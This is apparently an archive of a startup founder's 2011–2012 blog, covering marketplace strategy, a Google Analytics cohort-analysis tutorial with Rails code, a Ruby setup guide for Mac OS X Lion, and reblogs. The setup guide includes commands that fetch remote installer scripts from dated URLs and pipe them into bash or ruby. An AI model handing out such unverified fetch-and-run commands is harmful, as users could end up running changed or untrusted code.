So, understand the product you sell. eBay doesn’t sell second-hand goods, TaskRabbit doesn’t sell tasks and we don’t sell rooms. We sell trust. Our hosts sell rooms.

Chickens and eggs.

Do I need a chicken or an egg? Should we get supply first, or demand. The answer is both. Success is being able to ramp up both sides proportionally. We’ve found it best to start in one geography and achieve scalable liquidity then rinse and repeat. Two techniques we’ve found powerful:

A time critical event - find a reason why both sides of your marketplace are going to have to come together at the same point, giving you that initial liquidity. For example, the Olympics or Edinburgh Festival are great for us, as both sides concentrate their expectations and usage around the same window.

An existing strong network, a niche - the trick here is to find a group of users on both sides who are willing to put the extra effort and time into waiting for full liquidity. For eBay, this might be stamp collectors - they’re willing to come back and try again until they get that one perfect stamp. Someone buying a HiFi would simply go somewhere else that does have liquidity (a high-street store).

Types of value

Another important distinction between types of marketplace is between the types of value being sold: lasting vs one-time inventory. Lasting inventory you can reuse multiple times per listing, for example our rooms can be booked multiple times ad infinitum, baring unavailable periods. One-time inventory, for example goods on eBay, and only be consumed once, then you need to go back to square one and get more inventory. I think a large part of the success of the P2P accommodation model is due to the high value-to-supplier ratio compared with one-time inventory models.

Marketplace Half-life

This is something we began modelling a while ago, and has proved very powerful in predicting future behaviour.

The half-life of your (lasting) inventory is the time it takes for it to half in value.

In our case, this is the time it takes for the likelihood of a new booking request to be accepted. If a host gets a booking every week (say), then they’re engaged, their availability is up-to-date, and we know we have a reliable method of contacting them. After a period of time, that same probability drops as they’ve not been engaged so not updated their availability, may have changed email address, may have gone elsewhere for bookings, and so on.

Understanding your half-life allows you to balance the distribution of new bookings/guests effectively between first time users and repeat users. Each host has their own sweet-spot for bookings (every week, two weekends a month, every two months etc.), but when you hit it they’re yours.

Competition and Virality

There’s an inherent competition on either side of a marketplace. Either hosts are competing to get the (best) guests, or guests are competing to book the (best) hosts. If you can manage the level of competition on either side, you can cause both side to up their game. If our hosts see they’re moving down search results (but are still roughly within 1/2 half-life cycles) they’ll look at the new features and options to get them back up: maybe more photos, better descriptions or tagging, updating their calendar etc. Guests to likewise - they’ll provide more useful information about themselves, respond to messages quickly etc.

But. The side that’s competing generally won’t go viral or want to share your product or platform. A host that’s feeling a bit of competition to get bookings won’t want to tell their friends (who live in the same area, right?) about your service because that will only increase the competition they’re already facing. If they’re making more money that they know what to do with, they will. (Or if they’re essentially happily saturated).

You also don’t want competition on price. If you push competition on the supply side to far, you might end up with people cutting prices. At that point they’re probably done with your service anyway and your marketplace is essentially broken (there’s NO demand), but you also earn less money. If the supply side starts lowering prices, look hard at what’s going on.

Marketplaces are cool

We’ve been running a marketplace for 3 years now. We were one of the first into the P2P accommodation space, and it’s a brilliant model. The high network effect (Metcalfe’s law) makes switching expensive and thus your supply defensible. The more reviews a host has, the more reviews they get, and the bigger the drop from starting again elsewhere. And what’s really nice is building a business on existing, underused, value. We’re not building hotels, but selling shovels. We allow others to get more value from the world.

Any questions or comments do get involved below, or tweet me @serenestudios.

Take 5 minutes out of starting, pivoting, emailing, selling,...

Wed, 18 Jan 2012 10:35:13 +0000

Take 5 minutes out of starting, pivoting, emailing, selling, analysing and see what also matters. This is stunning perfection.

Startups: Hacking a Cohort Analysis with Google Analytics

Tue, 08 Nov 2011 11:33:00 +0000

At a recent Seedcamp day I was talking with a few teams about how to do a cohort analysis quickly and easily. We all know the value of actionable metrics above vanity metrics (thanks in part to Eric Ries’s new book), but getting them out is often a surprisingly difficult task, especially for a small team. At Crashpadder we do two kinds of cohort analysis - one is a custom built tool that runs off our database, and the other is a google analytics hack that I’ll show below.

The advantage of the database report is it’s accurate, it uses our more complex business logic and KPIs, and as we built it, it does exactly what we need. The downside is it’s not realtime/slowish (obvious N+1 issues with grouping data over and over), and needs to be run on our server (i.e. by me) - our new datalytics team member can’t just get stuck in. It’s not the kind of thing you do in a web request/live page, but we can run it once a day/week/month in a few minutes.

Google Analytics is great as everyone can access it from anywhere, we already use it for loads of tracking, and it has a relatively simple web interface. Downsides include accuracy and customisation. And did I mention accuracy?

So we use the database report for detailed analysis, and the Google Analytics hack to quickly spot trends, compare with other data, have data available on request, and so on.

So if you want to get started with some cohort analysis at your cool new startup, but don’t want to slow down your lighting fast build-test-learn loop and MVP building in the early days, try this.

The hack

The essence of this is to push custom variables to GA, along with your normal page data, that describes the current user, and then create advanced segments in GA to limit what you’re seeing to these users. We push 5 bits of data to GA at crashapdder; these will obviously be different for every startup:

Is the visitor currently logged in
Are they a member of Crashpadder
Are they a host or a guest
The year they joined (for this cohort analysis)
The month they joined (for this cohort analysis)

So here’s your normal GA code:


<script type="text/javascript" defer="defer">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-XXXXXX-1']);
  
  _gaq.push(['_setDomainName', 'www.mydomain.com']);
  _gaq.push(['_trackPageview']);
  _gaq.push(['_trackPageLoadTime']);
  
    
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

We add to this our custom variables as below. You should be able to pull this out of your current user variable/model/object (we’re using Ruby/Rails); simplified a bit, our code looks like this:


<script type="text/javascript" defer="defer">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-XXXXXX-1']);
  
  _gaq.push(['_setDomainName', 'www.mydomain.com']);
  _gaq.push(['_trackPageview']);
  _gaq.push(['_trackPageLoadTime']);
  
  _gaq.push(['_setCustomVar', 1, 'Logged in', <%= current_user.blank? ? "'no'" : "'yes'" %>, 2]);
  _gaq.push(['_setCustomVar', 2, 'Member', <%= current_user.blank? ? "'no'" : "'yes'" %>, 1]);
  _gaq.push(['_setCustomVar', 3, 'Host/guest', <%= (current_user.blank? || current_user.is_a_host?) ? "'host'" : "'guest'" %>, 1]);
  _gaq.push(['_setCustomVar', 4, 'Join month', <%= current_user.blank? ? "'0'" : "'#{current_user.created_at.month}'" %>, 1]);
  _gaq.push(['_setCustomVar', 5, 'Join year', <%= current_user.blank? ? "'0'" : "'#{current_user.created_at.year}'" %>, 1]);
  
  
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

This then renders in your browser something like this:


<script type="text/javascript" defer="defer">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-XXXXXX-1']);
  
  _gaq.push(['_setDomainName', 'www.mydomain.com']);
  _gaq.push(['_trackPageview']);
  _gaq.push(['_trackPageLoadTime']);
  
  _gaq.push(['_setCustomVar', 1, 'Logged in', 'yes', 2]);
  _gaq.push(['_setCustomVar', 2, 'Member', 'yes', 1]);
  _gaq.push(['_setCustomVar', 3, 'Host/guest', 'guest', 1]);
  _gaq.push(['_setCustomVar', 4, 'Join month', '8', 1]);
  _gaq.push(['_setCustomVar', 5, 'Join year', '2009', 1]);
  
  
  
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

(A keen observer will notice that the first two seem to do the same thing - whether they’re a member or logged in. The number on the end of each line specifies the lifetime of the cookie GA uses to track the user. We set whether they’re logged in to that session only, and whether they’re a member to lifetime. So after the first login, we know if you’re a member again, even if you don’t login the second time.)

Google Analytics

Now head over to your GA account, and click ‘Advanced Segments’. Under ‘custom segments’, click ‘New Custom Segment’.

Give this segment a title, say ‘November 2011 signups’

Drop down the variable type (default is usually ‘Ad Content’), and select the corresponding ‘Custom Variable (Value XX)’ for the join year. So in this case, Value 04 is our join month, and Value 05 is our join year.

Note: you need to choose the value rather than the key - in the above example, the key is ‘join month’ or ‘join year’, and the value is 2008/2009, 1-12 etc.

In the ‘containing’ box, enter the year you’re grouping by (here 2011). Click the ‘Add AND statement’ link, and repeat with the month, this time choosing the Value 04 and the month number, here 11. This is creating a segment that isolates everyone who joined in year=2011 and month=11.

Save the segment, and you’re now looking at your data only for people who joined in November 2011.

We create a new one every month for the incoming users, and can quickly filter all data by a particular cohort, or compare two cohorts with one another.

If you jump over to your goal tracking, you can start to see which cohort is converting better, what their profile looks like in the months after they joined, estimate their lifetime value, value half-life and so on.

Feel free to leave comments below!

alexanderljung: Agree! (Taken with Instagram at Readmill HQ)

Sun, 06 Nov 2011 16:54:23 +0000

alexanderljung:

Agree! (Taken with Instagram at Readmill HQ)

kcmr: (via xkcd: Sandwich)

Sat, 05 Nov 2011 14:25:33 +0000

kcmr:

(via xkcd: Sandwich)

Installing REE, Rails, XCode on Lion 10.7

Sat, 29 Oct 2011 14:15:00 +0100

A quick guide to installing Ruby Enterprise Edition, Rails, etc. on Mac OS X Lion. The main problem is that the latest XCode (4.2) ships with a messed up version of gcc. So:

1. Install XCode 4.2 from the App Store.

2. That actually places an App in Applications called ‘Install XCode’. Run that.

3. Install OSX GCC from here: https://github.com/kennethreitz/osx-gcc-installer This is a much better version of gcc, plus associated libs.

4. Install RVM:

bash < <(curl -s https://rvm.beginrescueend.com/install/rvm)

5. Install REE:

sudo CC=/usr/bin/gcc-4.2 rvm install ree

6. Use REE:

rvmsudo rvm use ree --default

7. (Optional) Install brew:

ruby -e "$(curl -fsSL https://raw.github.com/gist/323731)"

8. Rails, etc.

rvmsudo gem install rails

That’s it! Leave a comment if you have any better advice, or questions.

A very good analogy of what a startup often feels like…

Wed, 26 Oct 2011 13:48:59 +0100

A very good analogy of what a startup often feels like…

alexanderljung: 2 thoughts on our partnership with Facebook...

Sun, 25 Sep 2011 10:41:49 +0100

alexanderljung:

2 thoughts on our partnership with Facebook announced today

Nate Berkopec: NASA Problems and LEGO problems

Sun, 11 Sep 2011 23:07:07 +0100

Nate Berkopec: NASA Problems and LEGO problems:

nateberkopec:

NASA problems require many years and massive teams to solve. It took us over 10 years and 109 manned missions to gain enough knowledge and experience to send a man to the moon. That’s a lot of work.

Making a rocket of out LEGOs, comparatively, is trivial. Even if it’s a really big one - like 5…

crashpadderhq: Who are your favourite travel buddies? Post a...

Mon, 01 Aug 2011 14:22:44 +0100

crashpadderhq:

Who are your favourite travel buddies? Post a photo on our Facebook wall with your favourite travel buddy/buddies tagged for a chance to win a free weekend with any Crashpadder host around the world! (£100 max)

After you post your photo, you will have until Friday to beg, steal, or borrow (just kidding, begging is the only option!) the most ‘likes’ on your photo. The earlier you post, the more time you’ll have to collect ‘likes’. The photo with the most ‘likes’ will be the winner!

Competition begins: NOW! (01/08/11)

Competition ends: This Friday at noon (05/08/11)

Post your Photo Now

Rules:

One photo per person

The count ends 05/08/11 at noon - any ‘likes’ after that will not be counted.

£100 must go to accommodation with a Crashpadder pad of choice by (01/08/12)

The £100 is allowed to go towards the accommodation for you and a friend.

Elezea // B-sides: The tyranny of the mundane, or how nobody is happy any more.

Thu, 19 May 2011 14:38:12 +0100

Elezea // B-sides: The tyranny of the mundane, or how nobody is happy any more.:

elezea:

There’s a good article on Design Mind in response to a recent Seth Godin post about technology and magic. Here’s the part that stood out for me:

To me that’s all we’re really talking about, and core to Godin’s point (whether it was intended or not) is that stuff doesn’t wow us anymore,…

nickclegglookingsad: Nick Clegg wishes you wouldn’t keep taking...

Fri, 06 May 2011 17:37:53 +0100

nickclegglookingsad:

Nick Clegg wishes you wouldn’t keep taking his stuff, and then when he comes to get it back, throwing it to someone else so he can’t have it back.

@aws fail. @bt fail. @nakedwines win. At least something is...

Thu, 21 Apr 2011 18:03:14 +0100

@aws fail. @bt fail. @nakedwines win. At least something is working today.

"We’d like to provide additional color on what were working on right now (please note that we..."

Thu, 21 Apr 2011 17:13:33 +0100

“We’d like to provide additional color on what were working on right now (please note that we always know more and understand issues better after we fully recover and dive deep into the post mortem). A networking event early this morning triggered a large amount of re-mirroring of EBS volumes in US-EAST-1. This re-mirroring created a shortage of capacity in one of the US-EAST-1 Availability Zones, which impacted new EBS volume creation as well as the pace with which we could re-mirror and recover affected EBS volumes. Additionally, one of our internal control planes for EBS has become inundated such that it’s difficult to create new EBS volumes and EBS backed instances. We are working as quickly as possible to add capacity to that one Availability Zone to speed up the re-mirroring, and working to restore the control plane issue. We’re starting to see progress on these efforts, but are not there yet. We will continue to provide updates when we have them.”

- Starting to sound really quite serious… Not sure how fast one can add capacity, either physically or re-mapping from elsewhere. Time will tell.